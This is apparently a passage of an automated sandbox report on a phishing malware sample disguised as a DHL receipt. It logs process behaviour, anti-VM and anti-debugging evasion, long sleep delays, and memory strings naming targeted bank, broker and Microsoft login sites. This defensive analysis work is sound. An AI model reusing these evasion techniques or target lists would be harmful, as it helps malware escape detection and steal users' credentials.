                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: DHL AWB Receipt_pdf.bat.exe PID: 3180, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: oSJLRdDbLeQ.exe PID: 5592, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory allocated: 21D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory allocated: 2350000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory allocated: 4350000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory allocated: 89B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory allocated: 7260000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory allocated: 99B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory allocated: A9B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeMemory allocated: 15E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeMemory allocated: 92F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeMemory allocated: 7A90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeMemory allocated: A2F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeMemory allocated: B2F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0101096E rdtsc 10_2_0101096E
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8434Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9090Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 498Jump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeWindow / User API: threadDelayed 9841
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.7 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.2 %
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 7156Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432Thread sleep count: 8434 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2780Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432Thread sleep count: 281 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5672Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3624Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe TID: 7180Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7540Thread sleep count: 132 > 30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7540Thread sleep time: -264000s >= -30000s
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7540Thread sleep count: 9841 > 30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7540Thread sleep time: -19682000s >= -30000s
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe TID: 7556Thread sleep time: -65000s >= -30000s
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe TID: 7556Thread sleep time: -43500s >= -30000s
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe TID: 7556Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 46G3-7765.18.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 46G3-7765.18.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 46G3-7765.18.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 46G3-7765.18.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 46G3-7765.18.drBinary or memory string: global block list test formVMware20,11696428655
                Source: 46G3-7765.18.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: oSJLRdDbLeQ.exe, 0000000B.00000002.2458086544.0000000009115000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: 46G3-7765.18.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 46G3-7765.18.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 46G3-7765.18.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 46G3-7765.18.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 46G3-7765.18.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 46G3-7765.18.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 46G3-7765.18.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 46G3-7765.18.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 46G3-7765.18.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4687131877.0000000000959000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2787536888.00000250E334C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 46G3-7765.18.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 46G3-7765.18.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 46G3-7765.18.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 46G3-7765.18.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 46G3-7765.18.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 46G3-7765.18.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 46G3-7765.18.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 46G3-7765.18.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 46G3-7765.18.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 46G3-7765.18.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 46G3-7765.18.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 46G3-7765.18.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 46G3-7765.18.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 46G3-7765.18.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 46G3-7765.18.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 46G3-7765.18.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0101096E rdtsc 10_2_0101096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004179B3 LdrLoadDll,10_2_004179B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107E10E mov eax, dword ptr fs:[00000030h]10_2_0107E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107E10E mov ecx, dword ptr fs:[00000030h]10_2_0107E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107E10E mov eax, dword ptr fs:[00000030h]10_2_0107E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107E10E mov eax, dword ptr fs:[00000030h]10_2_0107E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107E10E mov ecx, dword ptr fs:[00000030h]10_2_0107E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107E10E mov eax, dword ptr fs:[00000030h]10_2_0107E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107E10E mov eax, dword ptr fs:[00000030h]10_2_0107E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107E10E mov ecx, dword ptr fs:[00000030h]10_2_0107E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107E10E mov eax, dword ptr fs:[00000030h]10_2_0107E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107E10E mov ecx, dword ptr fs:[00000030h]10_2_0107E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCC0F0 mov eax, dword ptr fs:[00000030h]10_2_00FCC0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD80E9 mov eax, dword ptr fs:[00000030h]10_2_00FD80E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01090115 mov eax, dword ptr fs:[00000030h]10_2_01090115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCA0E3 mov ecx, dword ptr fs:[00000030h]10_2_00FCA0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107A118 mov ecx, dword ptr fs:[00000030h]10_2_0107A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107A118 mov eax, dword ptr fs:[00000030h]10_2_0107A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107A118 mov eax, dword ptr fs:[00000030h]10_2_0107A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107A118 mov eax, dword ptr fs:[00000030h]10_2_0107A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01000124 mov eax, dword ptr fs:[00000030h]10_2_01000124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01064144 mov eax, dword ptr fs:[00000030h]10_2_01064144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01064144 mov eax, dword ptr fs:[00000030h]10_2_01064144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01064144 mov ecx, dword ptr fs:[00000030h]10_2_01064144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01064144 mov eax, dword ptr fs:[00000030h]10_2_01064144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01064144 mov eax, dword ptr fs:[00000030h]10_2_01064144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01068158 mov eax, dword ptr fs:[00000030h]10_2_01068158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD208A mov eax, dword ptr fs:[00000030h]10_2_00FD208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0108C188 mov eax, dword ptr fs:[00000030h]10_2_0108C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0108C188 mov eax, dword ptr fs:[00000030h]10_2_0108C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01010185 mov eax, dword ptr fs:[00000030h]10_2_01010185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01074180 mov eax, dword ptr fs:[00000030h]10_2_01074180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01074180 mov eax, dword ptr fs:[00000030h]10_2_01074180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFC073 mov eax, dword ptr fs:[00000030h]10_2_00FFC073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105019F mov eax, dword ptr fs:[00000030h]10_2_0105019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105019F mov eax, dword ptr fs:[00000030h]10_2_0105019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105019F mov eax, dword ptr fs:[00000030h]10_2_0105019F
